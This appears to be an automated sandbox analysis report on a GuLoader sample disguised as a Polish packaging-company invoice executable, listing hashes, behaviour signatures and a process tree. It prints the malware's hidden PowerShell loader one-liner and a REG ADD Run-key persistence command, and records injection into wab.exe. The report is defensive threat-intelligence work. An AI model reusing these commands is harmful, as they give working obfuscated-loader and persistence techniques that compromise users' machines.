Analysis
-
max time kernel
121s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 18:11
Static task
static1
Behavioral task
behavioral1
Sample
Colep Packaging Polska (602447) - invoice 342000749.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Colep Packaging Polska (602447) - invoice 342000749.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
Stningsstrukturers.ps1
Resource
win7-20240215-en
Behavioral task
behavioral4
Sample
Stningsstrukturers.ps1
Resource
win10v2004-20240426-en
General
-
Target
Colep Packaging Polska (602447) - invoice 342000749.exe
-
Size
427KB
-
MD5
2ceb634eba1c56c9dcf5daa8c78ebc92
-
SHA1
8c101631d550b07502f5e077b33d4142d6323a5d
-
SHA256
74e64ac4e30e760332d456eb22f9c287a378653566cf4eac6278c4576c2d5cf9
-
SHA512
042d3249ae6863ff90caae3001258e80a3e92f9abc8dbfb1ac0eb48dfcef7c72686a677a70c554a2a620680319aba93058d22c71b306252530f51cb874131caa
-
SSDEEP
6144:W9X0GVlmkDWa5rfgmIOVXAk85ltRn8j7r85ugCDo4pr3WWPC1LiJ1Km9:Y02FCa5M2m5LRnKg5D4pr3WrMJ1Km9
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Claybank = "%Sergius% -windowstyle minimized $metensomatosis=(Get-ItemProperty -Path 'HKCU:\\Marveller\\').Scaldic;%Sergius% ($metensomatosis)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2412 wab.exe 2412 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2992 powershell.exe 2412 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2992 set thread context of 2412 2992 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepid process 2992 powershell.exe 2992 powershell.exe 2992 powershell.exe 2992 powershell.exe 2992 powershell.exe 2992 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2992 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
Colep Packaging Polska (602447) - invoice 342000749.exepowershell.exewab.execmd.exedescription pid process target process PID 2040 wrote to memory of 2992 2040 Colep Packaging Polska (602447) - invoice 342000749.exe powershell.exe PID 2040 wrote to memory of 2992 2040 Colep Packaging Polska (602447) - invoice 342000749.exe powershell.exe PID 2040 wrote to memory of 2992 2040 Colep Packaging Polska (602447) - invoice 342000749.exe powershell.exe PID 2040 wrote to memory of 2992 2040 Colep Packaging Polska (602447) - invoice 342000749.exe powershell.exe PID 2992 wrote to memory of 2792 2992 powershell.exe cmd.exe PID 2992 wrote to memory of 2792 2992 powershell.exe cmd.exe PID 2992 wrote to memory of 2792 2992 powershell.exe cmd.exe PID 2992 wrote to memory of 2792 2992 powershell.exe cmd.exe PID 2992 wrote to memory of 2412 2992 powershell.exe wab.exe PID 2992 wrote to memory of 2412 2992 powershell.exe wab.exe PID 2992 wrote to memory of 2412 2992 powershell.exe wab.exe PID 2992 wrote to memory of 2412 2992 powershell.exe wab.exe PID 2992 wrote to memory of 2412 2992 powershell.exe wab.exe PID 2992 wrote to memory of 2412 2992 powershell.exe wab.exe PID 2412 wrote to memory of 2244 2412 wab.exe cmd.exe PID 2412 wrote to memory of 2244 2412 wab.exe cmd.exe PID 2412 wrote to memory of 2244 2412 wab.exe cmd.exe PID 2412 wrote to memory of 2244 2412 wab.exe cmd.exe PID 2244 wrote to memory of 2536 2244 cmd.exe reg.exe PID 2244 wrote to memory of 2536 2244 cmd.exe reg.exe PID 2244 wrote to memory of 2536 2244 cmd.exe reg.exe PID 2244 wrote to memory of 2536 2244 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Colep Packaging Polska (602447) - invoice 342000749.exe"C:\Users\Admin\AppData\Local\Temp\Colep Packaging Polska (602447) - invoice 342000749.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Undertrykt=Get-Content 'C:\Users\Admin\AppData\Local\Temp\rumfangsformlers\mettemaries\Stningsstrukturers.Rec';$Sludrehoved=$Undertrykt.SubString(60222,3);.$Sludrehoved($Undertrykt)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:2792
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Claybank" /t REG_EXPAND_SZ /d "%Sergius% -windowstyle minimized $metensomatosis=(Get-ItemProperty -Path 'HKCU:\Marveller\').Scaldic;%Sergius% ($metensomatosis)"4⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Claybank" /t REG_EXPAND_SZ /d "%Sergius% -windowstyle minimized $metensomatosis=(Get-ItemProperty -Path 'HKCU:\Marveller\').Scaldic;%Sergius% ($metensomatosis)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:2536
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5280a075b59fc3437aa4ba871dc3e80f5
SHA1b8097c11ba64de3151a7650b3796af78ad3621cb
SHA256aa96dfbed335c656e95a1311b046b0cdd93b3a3f2f063b2d4744257655535404
SHA512b3e44aa0861616f319f5f844fc7dfe59a0834babfa7f8fd127c9fc5cd4d2545b800914831acbce68df45068f61277aaeb4e446b80802d43176d18b5b15a8b052
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
58KB
MD5dd200d8c3c09458738a4ee7d421a891b
SHA15821db55a8a2e95c67411c18893530d9c3cd47c6
SHA2560e5ad13c4627a6fcb258cbcf2e67bde5ac0f66b8e85291ba05dacc5021eeb4df
SHA512a2faef0cb547f0ee91ca5b45893300fc18943d1389f593bf2b58f557d8e85f7346e55be8a592c87e6e32dc98f9d568a05e59cc7d93b9288391c0465b6a68f39d
-
Filesize
314KB
MD5919a448703aa1422caf492b3efe5511f
SHA1cdb804083bd4ce2b5aef89bbc85bbcff9b25b041
SHA25686291eed6935825b6d1a58b2f7e786cc9771e560e10c29c4e3c9c5e848a1fe70
SHA512c6950b84f08b9c5e2d38b4b0b5717d3196e76c28da6491e421beb829460ad0f2c6f10e9e1f67d7aae0a434ae5492f60e22cc656924d52c8fe45a71b1824bca11